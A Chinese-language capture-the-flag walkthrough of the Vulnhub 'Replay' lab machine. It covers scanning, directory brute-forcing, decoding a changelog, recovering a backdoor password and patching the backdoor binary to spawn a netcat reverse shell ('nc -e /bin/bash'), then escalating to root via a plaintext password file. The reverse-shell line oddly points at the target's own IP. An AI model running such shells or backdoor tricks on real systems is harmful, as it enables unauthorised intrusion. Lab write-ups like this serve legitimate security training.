Replay_CTF靶机渗透
靶机环境
- 靶机(Linux): 192.168.40.137
- 攻击机(Kali): 192.168.40.129
下载地址:https://www.vulnhub.com/entry/replay-1,278/
渗透过程
按照惯例,得先找到对方IP,所以 nmap192.168.40.0/24扫描一下
找到靶机的IP为192.168.40.137,开启了两个端口,ssh和http
打开网页查看一下
在源代码中发现了一条注释的内容,暂时不知道有什么用,所以先放着
按照流程,接下来应该爆破目录了
dirb http://192.168.40.137/ /usr/share/dirb/wordlist/comment.txt找到网站是存在robots.txt这个文件的
扫描子目录的多少和字典有关系,有的robots.txt中会存在一些扫描不到的东西,所以还是有访问价值的),访问后发现根目录下有一个 .zip文件
下载下来后解压,看到有两个文件
changelog.txt是更新日志,先看一下网站的更新内容,打开文件后发现文件部分内容为base64编码,拎去解码后的明文如下
从4个版本中可以看到,这个作者在网站中创建了一个后门程序,用于他自己连接,这个后门程序是 python2.7版本写的, 硬编码成了 .bin文件,所以我们也可以顺便利用一下, ./client.bin后发现需要输入密码
用vim打开.bin文件后, /password搜索找到了2nd(第二部分)的密码,故而猜测是和前面P1拼接在一起的,回头复制粘贴拼接密码
密码:qGQjwO4h6gh0TAIRNXuQcDu9Lqsyul有了账号密码后,运行.bin文件 输入了IP和密码后,发现执行了一条 whoami命令,这部分应该是写进.bin里面的
所以vim进入 client.bin,查找 whoami
找到了执行命令的这一部分,那么就可以开始反弹shell了,因为是硬编码的缘故,所以字符数量必须和之前的一样,否则不能运行,就好比,100个字符的文件,不论怎么修改,最后都只能100字符,否则就无法运行;那么我们先构造反弹的语句
nc -e /bin/bash 192.168.40.137 4444为了程序能正常运行,所以我们得把前面的一些字符串删除,以此来达到“平衡” 在Python中计算反弹语句的长度为 35
原先的命令 whoami为6位,所以我们得向前删除29位,最后的样子是这个
接着在Kali中开启监听
nc -lvp 4444开启完成后,运行后门程序,触发shell
得到shell后,开始提权
在 /home/bob/Document/.ftp/目录下发现了一个 .user.passwdcat查看后,找到了bob的密码,直接 sudu su输入密码就切换成了root
最后,在根目录下发现flag.txt, cat flag.txt获取flag,完成
总结
这个靶机在进入系统后的提权简直弱智,就像是为了增加这么一个环节而强行增加上去的一样,毫无技术含量,你能找得到文件就能提权,找不到就万年 bob,前面后门程序部分还是挺有意思的